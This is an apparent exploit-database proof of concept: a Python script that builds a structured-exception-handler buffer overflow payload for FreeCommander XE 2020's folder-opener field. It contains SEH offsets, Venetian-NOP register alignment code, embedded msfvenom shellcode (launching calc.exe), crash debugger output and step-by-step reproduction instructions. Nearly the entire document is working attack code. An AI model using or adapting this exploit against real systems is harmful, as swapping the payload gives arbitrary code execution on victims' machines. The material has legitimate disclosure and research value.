FreeCommander XE 2020 Pathname Buffer Overflow

`#!/usr/bin/python  
  
# Exploit Title: FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)  
# Version: Build 810a 32-bit  
# Software Link: https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip  
# Date: 2020-03-28  
# Exploit Author: Hodorsec ([email protected] / [email protected])  
# Vendor Homepage: https://www.freecommander.com  
# Tested on: Win8.1 x64 - Build 9600  
  
# Description:   
# - Exploits the command / folder opener in the main window by entering an overly string and pressing enter: a crash will occur and the Structured Exception Handler kicks in (SEH overflown).  
# - Some stack alignment was required, which eventually led to the ability of running shellcode.  
  
# Reproduction:  
# - Use indicated OS or manipulate settings for stack alignment: your mileage may vary due to different offsets on other Windows versions / SP's.  
# - Run the script, a TXT file will be generated  
# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output in the command / folder opener of FreeCommander  
# - Check results  
  
# WinDBG initial crash output:  
# (db4.648): Access violation - code c0000005 (!!! second chance !!!)  
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -   
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\FreeCommander XE\FreeCommander.exe -   
# eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000  
# eip=00410041 esp=00091620 ebp=00091640 iopl=0 nv up ei pl zr na pe nc  
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
# FreeCommander+0x10041:  
# 00410041 0064005c add byte ptr [eax+eax+5Ch],ah ds:002b:0000005c=??  
  
import sys, struct  
  
# Filename  
filename = "win8_freecommander_poc.txt"  
  
# Maximum length  
maxlen = 2000  
  
# Shellcode  
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "\x00\x0a\x0d" bufferregister=eax  
# Payload size: 512 bytes  
shellcode = (  
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlzHTBypkPm0aP2ixep190bDTKnpP0bk0RJl4Kobn44KbRKxjoFW0Jo6p1KODlml1Q3LlBNLKpy1XOLMm1UwgrzR1Br7tKobzp2k0JmlDKNlJq2XySPHzaHQR1bkaImPIqWc2k0In8jCmjMyRknT2kzaZ6maIo4leq6ozmm1i7NX7pPul6JccMzXmk3MKtSEhdnxTKb8ldza6srFBklLPKbkqHMLKQhSbkM4dKIqVp1ymtmTldokokQQaIoj21yoK01OOoPZDKzrxkDM1MaZZa4M55UbM0ipkPr0S8nQRkROu7KOWeukHpTuFB1F2HvFBuWMuMio6umlM6CLZjQpIk7pRUlEWKa7mCsBrO1ZypR3ioxU0cS12LosnNpet80eM0AA"  
)  
  
# Offsets  
seh = 522  
nseh = seh - 2  
  
# Venetian NOP  
nop = "\x45"  
  
# Aligning EBP with buffer  
# ESP being closest to buffer  
# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9b  
align_esp = ( "\x54" # PUSH ESP  
+ nop + # Padding  
"\x58" # POP EAX  
+ nop + # Padding  
"\x05\x11\x11" # "\x05\x00\x10\x00\x11" # 0500100011 add eax,0x11001000 --\  
+ nop + # Padding |--> Adds 0x0f00 bytes  
"\x2d\x02\x11" # "\x2d\x00\x01\x00\x11" # 2d00010011 sub eax,0x11000100 --/  
+ nop + # Padding  
"\x40" # INC EAX # Added due to one-off unicode byte  
+ nop + # Padding  
"\x50" # PUSH EAX  
+ nop + # Padding  
"\xc3" # RET  
)  
  
# Prefix  
prefix = "A" * seh # Fill junk  
# NSEH/SEH  
nseh = "\x41\x45" # NOP --> INC ECX # ADD [EBP], AL  
seh = "\x71\x4c" # POP POP RET  
# Suffix  
suffix = nop * 3 # Align  
suffix += align_esp # Align registers; EAX for executing shellcode  
suffix += nop * 48 # Nopping until buffer  
suffix += shellcode # Do some magic  
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Fill junk  
  
# Concatenate string for payload  
payload = prefix + nseh + seh + suffix # Put it all together  
  
try:  
file = open(filename,"wb")  
file.write(payload)  
file.close()  
print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"  
except:  
print "[!] Error creating file!"  
sys.exit(0)  
  
`